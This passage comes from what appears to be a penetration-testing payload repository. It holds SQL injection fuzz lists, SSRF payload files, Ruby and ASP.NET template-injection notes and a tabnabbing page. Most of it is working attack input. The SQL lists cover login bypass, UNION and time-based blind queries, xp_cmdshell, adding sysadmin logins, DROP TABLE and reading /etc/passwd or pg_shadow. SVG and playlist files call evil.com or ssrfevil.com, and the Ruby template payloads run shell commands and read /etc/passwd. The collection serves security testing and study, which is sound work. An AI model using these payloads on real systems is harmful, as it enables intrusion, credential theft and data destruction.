 94 | 'or 1=1 or ''='
 95 | "or 1=1 or ""="
 96 | ' or 'a'='a
 97 | ' or a=a--
 98 | ' or a=a–
 99 | ') or ('a'='a
100 | " or "a"="a
101 | ") or ("a"="a
102 | ') or ('a'='a and hi") or ("a"="a
103 | ' or 'one'='one
104 | ' or 'one'='one–
105 | ' or uid like '%
106 | ' or uname like '%
107 | ' or userid like '%
108 | ' or user like '%
109 | ' or username like '%
110 | ' or 'x'='x
111 | ') or ('x'='x
112 | " or "x"="x
113 | ' OR 'x'='x'#;
114 | '=' 'or' and '=' 'or'
115 | ' UNION ALL SELECT 1, @@version;#
116 | ' UNION ALL SELECT system_user(),user();#
117 | ' UNION select table_schema,table_name FROM information_Schema.tables;#
118 | admin' and substring(password/text(),1,1)='7
119 | ' and substring(password/text(),1,1)='7
120 | ' or 1=1 limit 1 -- -+
121 | '="or'
122 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt:
--------------------------------------------------------------------------------
 1 |  waitfor delay '0:0:20' /* 
 2 |  waitfor delay '0:0:20' --
 3 | ' waitfor delay '0:0:20' /* 
 4 | ' waitfor delay '0:0:20' --
 5 | " waitfor delay '0:0:20' /* 
 6 | " waitfor delay '0:0:20' --
 7 | ) waitfor delay '0:0:20' /* 
 8 | ) waitfor delay '0:0:20' --
 9 | )) waitfor delay '0:0:20' /* 
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /* 
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /* 
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /* 
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /* 
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /* 
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /* 
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /* 
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /* 
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /* 
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /* 
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /* 
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /* 
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /* 
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /* 
40 | ")))))) waitfor delay '0:0:20' --


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MSSQL.txt:
--------------------------------------------------------------------------------
 1 | # you will need to customize/modify some of the values in the queries for best effect
 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'--
 3 | 'create user name identified by 'pass123' --
 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 
 5 | ' ; drop table temp --
 6 | 'exec sp_addlogin 'name' , 'password' --
 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' --
 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
 9 | ' grant connect to name; grant resource to name; --
10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
11 | ' or 1=1 --
12 | ' union (select @@version) --
13 | ' union (select NULL, (select @@version)) --
14 | ' union (select NULL, NULL, (select @@version)) --
15 | ' union (select NULL, NULL, NULL,  (select @@version)) --
16 | ' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
17 | ' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
18 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MYSQL.txt:
--------------------------------------------------------------------------------
1 | 1'1
2 | 1 exec sp_ (or exec xp_)
3 | 1 and 1=1
4 | 1' and 1=(select count(*) from tablenames); --
5 | 1 or 1=1
6 | 1' or '1'='1
7 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt:
--------------------------------------------------------------------------------
 1 |  and 0=benchmark(3000000,MD5(1))%20/*
 2 |  and 0=benchmark(3000000,MD5(1))%20--
 3 |  and 0=benchmark(3000000,MD5(1))%20%23
 4 | ' and 0=benchmark(3000000,MD5(1))%20/*
 5 | ' and 0=benchmark(3000000,MD5(1))%20--
 6 | ' and 0=benchmark(3000000,MD5(1))%20%23
 7 | " and 0=benchmark(3000000,MD5(1))%20/*
 8 | " and 0=benchmark(3000000,MD5(1))%20--
 9 | " and 0=benchmark(3000000,MD5(1))%20%23
10 | ) and 0=benchmark(3000000,MD5(1))%20/*
11 | ) and 0=benchmark(3000000,MD5(1))%20--
12 | ) and 0=benchmark(3000000,MD5(1))%20%23
13 | )) and 0=benchmark(3000000,MD5(1))%20/*
14 | )) and 0=benchmark(3000000,MD5(1))%20--
15 | )) and 0=benchmark(3000000,MD5(1))%20%23
16 | ))) and 0=benchmark(3000000,MD5(1))%20/*
17 | ))) and 0=benchmark(3000000,MD5(1))%20--
18 | ))) and 0=benchmark(3000000,MD5(1))%20%23
19 | )))) and 0=benchmark(3000000,MD5(1))%20/*
20 | )))) and 0=benchmark(3000000,MD5(1))%20--
21 | )))) and 0=benchmark(3000000,MD5(1))%20%23
22 | ') and 0=benchmark(3000000,MD5(1))%20/*
23 | ') and 0=benchmark(3000000,MD5(1))%20--
24 | ') and 0=benchmark(3000000,MD5(1))%20%23
25 | ") and 0=benchmark(3000000,MD5(1))%20/*
26 | ") and 0=benchmark(3000000,MD5(1))%20--
27 | ") and 0=benchmark(3000000,MD5(1))%20%23
28 | ')) and 0=benchmark(3000000,MD5(1))%20/*
29 | ')) and 0=benchmark(3000000,MD5(1))%20--
30 | ')) and 0=benchmark(3000000,MD5(1))%20%23
31 | ")) and 0=benchmark(3000000,MD5(1))%20/*
32 | ")) and 0=benchmark(3000000,MD5(1))%20--
33 | ")) and 0=benchmark(3000000,MD5(1))%20%23
34 | '))) and 0=benchmark(3000000,MD5(1))%20/*
35 | '))) and 0=benchmark(3000000,MD5(1))%20--
36 | '))) and 0=benchmark(3000000,MD5(1))%20%23
37 | "))) and 0=benchmark(3000000,MD5(1))%20/*
38 | "))) and 0=benchmark(3000000,MD5(1))%20--
39 | "))) and 0=benchmark(3000000,MD5(1))%20%23
40 | ')))) and 0=benchmark(3000000,MD5(1))%20/*
41 | ')))) and 0=benchmark(3000000,MD5(1))%20--
42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23
43 | ")))) and 0=benchmark(3000000,MD5(1))%20/*
44 | ")))) and 0=benchmark(3000000,MD5(1))%20--
45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt:
--------------------------------------------------------------------------------
1 | # mysql local file disclosure through sqli
2 | # fuzz interesting absolute filepath/filename into <filepath>
3 | create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
4 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_Postgres_Enumeration.txt:
--------------------------------------------------------------------------------
 1 | # info disclosure payload fuzzfile for pgsql
 2 | select version();	
 3 | select current_database();
 4 | select current_user;
 5 | select session_user;
 6 | select current_setting('log_connections');
 7 | select current_setting('log_statement');
 8 | select current_setting('port');
 9 | select current_setting('password_encryption');
10 | select current_setting('krb_server_keyfile');
11 | select current_setting('virtual_host');
12 | select current_setting('port');
13 | select current_setting('config_file');
14 | select current_setting('hba_file');
15 | select current_setting('data_directory');
16 | select * from pg_shadow;
17 | select * from pg_group;
18 | create table myfile (input TEXT);
19 | copy myfile from '/etc/passwd'; 
20 | select * from myfile;copy myfile to /tmp/test;
21 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/Generic_Fuzz.txt:
--------------------------------------------------------------------------------
 1 | 1
 2 | 1'
 3 | 1"
 4 | [1]
 5 | 1`
 6 | 1\
 7 | 1/*'*/
 8 | 1/*!1111'*/
 9 | 1'||'asd'||'
10 | 1' or '1'='1
11 | 1 or 1=1
12 | 'or''='


--------------------------------------------------------------------------------
/SQL Injection/Intruder/SQL-Injection:
--------------------------------------------------------------------------------
 1 | '
 2 | ''
 3 | `
 4 | ``
 5 | ,
 6 | "
 7 | ""
 8 | /
 9 | //
10 | \
11 | \\
12 | ;
13 | ' or "
14 | -- or # 
15 | ' OR '1
16 | ' OR 1 -- -
17 | " OR "" = "
18 | " OR 1 = 1 -- -
19 | ' OR '' = '
20 | '='
21 | 'LIKE'
22 | '=0--+
23 |  OR 1=1
24 | ' OR 'x'='x
25 | ' AND id IS NULL; --
26 | '''''''''''''UNION SELECT '2
27 | %00
28 | /*…*/ 
29 | +		addition, concatenate (or space in url)
30 | ||		(double pipe) concatenate
31 | %		wildcard attribute indicator
32 | @variable	local variable
33 | @@variable	global variable
34 | # Numeric
35 | AND 1
36 | AND 0
37 | AND true
38 | AND false
39 | 1-false
40 | 1-true
41 | 1*56
42 | -2
43 | 1' ORDER BY 1--+
44 | 1' ORDER BY 2--+
45 | 1' ORDER BY 3--+
46 | 1' ORDER BY 1,2--+
47 | 1' ORDER BY 1,2,3--+
48 | 1' GROUP BY 1,2,--+
49 | 1' GROUP BY 1,2,3--+
50 | ' GROUP BY columnnames having 1=1 --
51 | -1' UNION SELECT 1,2,3--+
52 | ' UNION SELECT sum(columnname ) from tablename --
53 | -1 UNION SELECT 1 INTO @,@
54 | -1 UNION SELECT 1 INTO @,@,@
55 | 1 AND (SELECT * FROM Users) = 1	
56 | ' AND MID(VERSION(),1,1) = '5';
57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
58 | Finding the table name
59 | Time-Based:
60 | ,(select * from (select(sleep(10)))a)
61 | %2c(select%20*%20from%20(select(sleep(10)))a)
62 | ';WAITFOR DELAY '0:0:30'--
63 | Comments:
64 | #	    Hash comment
65 | /*  	C-style comment
66 | -- -	SQL comment
67 | ;%00	Nullbyte
68 | `	    Backtick
69 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/SQLi_Polyglots.txt:
--------------------------------------------------------------------------------
1 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
3 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE:
--------------------------------------------------------------------------------
 1 |  waitfor delay '0:0:20' /* 
 2 |  waitfor delay '0:0:20' --
 3 | ' waitfor delay '0:0:20' /* 
 4 | ' waitfor delay '0:0:20' --
 5 | " waitfor delay '0:0:20' /* 
 6 | " waitfor delay '0:0:20' --
 7 | ) waitfor delay '0:0:20' /* 
 8 | ) waitfor delay '0:0:20' --
 9 | )) waitfor delay '0:0:20' /* 
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /* 
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /* 
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /* 
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /* 
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /* 
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /* 
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /* 
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /* 
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /* 
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /* 
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /* 
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /* 
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /* 
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /* 
40 | ")))))) waitfor delay '0:0:20' --
41 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY:
--------------------------------------------------------------------------------
 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
19 | 


--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MySQL-WHERE:
--------------------------------------------------------------------------------
 1 |  and 0=benchmark(3000000,MD5(1))%20/*
 2 |  and 0=benchmark(3000000,MD5(1))%20--
 3 |  and 0=benchmark(3000000,MD5(1))%20%23
 4 | ' and 0=benchmark(3000000,MD5(1))%20/*
 5 | ' and 0=benchmark(3000000,MD5(1))%20--
 6 | ' and 0=benchmark(3000000,MD5(1))%20%23
 7 | " and 0=benchmark(3000000,MD5(1))%20/*
 8 | " and 0=benchmark(3000000,MD5(1))%20--
 9 | " and 0=benchmark(3000000,MD5(1))%20%23
10 | ) and 0=benchmark(3000000,MD5(1))%20/*
11 | ) and 0=benchmark(3000000,MD5(1))%20--
12 | ) and 0=benchmark(3000000,MD5(1))%20%23
13 | )) and 0=benchmark(3000000,MD5(1))%20/*
14 | )) and 0=benchmark(3000000,MD5(1))%20--
15 | )) and 0=benchmark(3000000,MD5(1))%20%23
16 | ))) and 0=benchmark(3000000,MD5(1))%20/*
17 | ))) and 0=benchmark(3000000,MD5(1))%20--
18 | ))) and 0=benchmark(3000000,MD5(1))%20%23
19 | )))) and 0=benchmark(3000000,MD5(1))%20/*
20 | )))) and 0=benchmark(3000000,MD5(1))%20--
21 | )))) and 0=benchmark(3000000,MD5(1))%20%23
22 | ') and 0=benchmark(3000000,MD5(1))%20/*
23 | ') and 0=benchmark(3000000,MD5(1))%20--
24 | ') and 0=benchmark(3000000,MD5(1))%20%23
25 | ") and 0=benchmark(3000000,MD5(1))%20/*
26 | ") and 0=benchmark(3000000,MD5(1))%20--
27 | ") and 0=benchmark(3000000,MD5(1))%20%23
28 | ')) and 0=benchmark(3000000,MD5(1))%20/*
29 | ')) and 0=benchmark(3000000,MD5(1))%20--
30 | ')) and 0=benchmark(3000000,MD5(1))%20%23
31 | ")) and 0=benchmark(3000000,MD5(1))%20/*
32 | ")) and 0=benchmark(3000000,MD5(1))%20--
33 | ")) and 0=benchmark(3000000,MD5(1))%20%23
34 | '))) and 0=benchmark(3000000,MD5(1))%20/*
35 | '))) and 0=benchmark(3000000,MD5(1))%20--
36 | '))) and 0=benchmark(3000000,MD5(1))%20%23
37 | "))) and 0=benchmark(3000000,MD5(1))%20/*
38 | "))) and 0=benchmark(3000000,MD5(1))%20--
39 | "))) and 0=benchmark(3000000,MD5(1))%20%23
40 | ')))) and 0=benchmark(3000000,MD5(1))%20/*
41 | ')))) and 0=benchmark(3000000,MD5(1))%20--
42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23
43 | ")))) and 0=benchmark(3000000,MD5(1))%20/*
44 | ")))) and 0=benchmark(3000000,MD5(1))%20--
45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23
46 | 


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/SSRF_expect.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
2 |     <image xlink:href="expect://ls"></image>
3 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/SSRF_url.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
2 |     <image xlink:href="http://evil.com/"></image>
3 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/ssrf_ffmpeg.avi:
--------------------------------------------------------------------------------
1 | #EXTM3U
2 | #EXT-X-MEDIA-SEQUENCE:0
3 | #EXTINF:1.0
4 | http://ssrfevil.com
5 | #EXT-X-ENDLIST


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/ssrf_iframe.svg:
--------------------------------------------------------------------------------
1 | <svg width="6000" height="6000">
2 |   <g>
3 |     <foreignObject width="6000" height="6000">
4 |       <body xmlns="http://www.w3.org/1999/xhtml">
5 |         <iframe src="http://localhost/"></iframe>
6 |       </body>
7 |     </foreignObject>
8 |   </g>
9 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/ssrf_svg_css_import.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg">
2 |   <style>
3 |     @import url(http://example.com/style.css);
4 |   </style>
5 |   <circle cx="50" cy="50" r="45" fill="green"
6 |           id="foo"/>
7 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/ssrf_svg_css_link.svg:
--------------------------------------------------------------------------------
1 | <svg width="100%" height="100%" viewBox="0 0 100 100"
2 |      xmlns="http://www.w3.org/2000/svg">
3 | 	<link xmlns="http://www.w3.org/1999/xhtml" rel="stylesheet" href="http://example.com/style.css" type="text/css"/>
4 |   <circle cx="50" cy="50" r="45" fill="green"
5 |           id="foo"/>
6 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg:
--------------------------------------------------------------------------------
1 | <?xml-stylesheet href="http://example.com/style.css"?>
2 | <svg width="100%" height="100%" viewBox="0 0 100 100"
3 |      xmlns="http://www.w3.org/2000/svg">
4 |   <circle cx="50" cy="50" r="45" fill="green"
5 |           id="foo"/>
6 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/ssrf_svg_image.svg:
--------------------------------------------------------------------------------
1 | <svg width="200" height="200"
2 |   xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
3 |   <image xlink:href="https://example.com/image.jpg" height="200" width="200"/>
4 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Files/ssrf_svg_use.svg:
--------------------------------------------------------------------------------
1 | <svg width="200" height="200"
2 |   xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
3 |   <use xlink:href="https://example.com/file2.svg#foo"/>
4 | </svg>


--------------------------------------------------------------------------------
/Server Side Request Forgery/Images/Parser and Curl less than 7.54.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/Parser and Curl less than 7.54.png


--------------------------------------------------------------------------------
/Server Side Request Forgery/Images/SSRF_PDF.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/SSRF_PDF.png


--------------------------------------------------------------------------------
/Server Side Request Forgery/Images/SSRF_Parser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/SSRF_Parser.png


--------------------------------------------------------------------------------
/Server Side Request Forgery/Images/SSRF_stream.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/SSRF_stream.png


--------------------------------------------------------------------------------
/Server Side Request Forgery/Images/WeakParser.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/WeakParser.jpg


--------------------------------------------------------------------------------
/Server Side Request Forgery/Images/aws-cli.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/aws-cli.jpg


--------------------------------------------------------------------------------
/Server Side Template Injection/ASP.md:
--------------------------------------------------------------------------------
 1 | # Server Side Template Injection - ASP.NET
 2 | 
 3 | > Server-Side Template Injection (SSTI)  is a class of vulnerabilities where an attacker can inject malicious input into a server-side template, causing the template engine to execute arbitrary code on the server. In the context of ASP.NET, SSTI can occur if user input is directly embedded into a template (such as Razor, ASPX, or other templating engines) without proper sanitization.
 4 | 
 5 | ## Summary
 6 | 
 7 | - [ASP.NET Razor](#aspnet-razor)
 8 |     - [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
 9 |     - [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
10 | - [References](#references)
11 | 
12 | ## ASP.NET Razor
13 | 
14 | [Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
15 | 
16 | > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
17 | 
18 | ### ASP.NET Razor - Basic Injection
19 | 
20 | ```powershell
21 | @(1+2)
22 | ```
23 | 
24 | ### ASP.NET Razor - Command Execution
25 | 
26 | ```csharp
27 | @{
28 |   // C# code
29 | }
30 | ```
31 | 
32 | ## References
33 | 
34 | - [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
35 | 


--------------------------------------------------------------------------------
/Server Side Template Injection/Images/serverside.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Template Injection/Images/serverside.png


--------------------------------------------------------------------------------
/Server Side Template Injection/Images/template-library.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Template Injection/Images/template-library.jpg


--------------------------------------------------------------------------------
/Server Side Template Injection/Ruby.md:
--------------------------------------------------------------------------------
 1 | # Server Side Template Injection - Ruby
 2 | 
 3 | > Server-Side Template Injection (SSTI)  is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation.
 4 | 
 5 | ## Summary
 6 | 
 7 | - [Templating Libraries](#templating-libraries)
 8 | - [Ruby](#ruby)
 9 |     - [Ruby - Basic injections](#ruby---basic-injections)
10 |     - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
11 |     - [Ruby - List files and directories](#ruby---list-files-and-directories)
12 |     - [Ruby - Remote Command execution](#ruby---remote-command-execution)
13 | - [References](#references)
14 | 
15 | ## Templating Libraries
16 | 
17 | | Template Name | Payload Format |
18 | | ------------ | --------- |
19 | | Erb      | `<%= %>`   |
20 | | Erubi    | `<%= %>`   |
21 | | Erubis   | `<%= %>`   |
22 | | HAML     | `#{ }`     |
23 | | Liquid   | `{{ }}`    |
24 | | Mustache | `{{ }}`    |
25 | | Slim     | `#{ }`     |
26 | 
27 | ## Ruby
28 | 
29 | ### Ruby - Basic injections
30 | 
31 | **ERB**:
32 | 
33 | ```ruby
34 | <%= 7 * 7 %>
35 | ```
36 | 
37 | **Slim**:
38 | 
39 | ```ruby
40 | #{ 7 * 7 }
41 | ```
42 | 
43 | ### Ruby - Retrieve /etc/passwd
44 | 
45 | ```ruby
46 | <%= File.open('/etc/passwd').read %>
47 | ```
48 | 
49 | ### Ruby - List files and directories
50 | 
51 | ```ruby
52 | <%= Dir.entries('/') %>
53 | ```
54 | 
55 | ### Ruby - Remote Command execution
56 | 
57 | Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine.
58 | 
59 | ```ruby
60 | <%=(`nslookup oastify.com`)%>
61 | <%= system('cat /etc/passwd') %>
62 | <%= `ls /` %>
63 | <%= IO.popen('ls /').readlines()  %>
64 | <% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
65 | <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
66 | ```
67 | 
68 | Execute code using SSTI for **Slim** engine.
69 | 
70 | ```powershell
71 | #{ %x|env| }
72 | ```
73 | 
74 | ## References
75 | 
76 | - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
77 | 


--------------------------------------------------------------------------------
/Tabnabbing/README.md:
--------------------------------------------------------------------------------
 1 | # Tabnabbing
 2 | 
 3 | > Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Methodology](#methodology)
 9 | * [Exploit](#exploit)
10 | * [Discover](#discover)
11 | * [References](#references)
12 | 
13 | ## Tools
14 | 
15 | * [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing
16 | 
17 | ## Methodology
18 | 
19 | When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing.
20 | 
21 | ## Exploit
22 | 
23 | 1. Attacker posts a link to a website under his control that contains the following JS code: `window.opener.location = "http://evil.com"`
24 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
25 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
26 | 4. If the victim opens the background tab again and doesn't look at the address bar, it may happen that he thinks he is logged out, because a login page appears, for example.
27 | 5. The victim tries to log on again and the attacker receives the credentials
28 | 
29 | ## Discover
30 | 
31 | Search for the following link formats:
32 | 
33 | ```html
34 | <a href="..." target="_blank" rel=""> 
35 | <a href="..." target="_blank">
36 | ```
37 | 
38 | ## References
39 | 
40 | * [Reverse Tabnabbing - OWASP - October 20, 2020](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
41 | * [Tabnabbing - Wikipedia - May 25, 2010](https://en.wikipedia.org/wiki/Tabnabbing)
42 | 


--------------------------------------------------------------------------------
/Type Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png:
--------------------------------------------------------------------------------
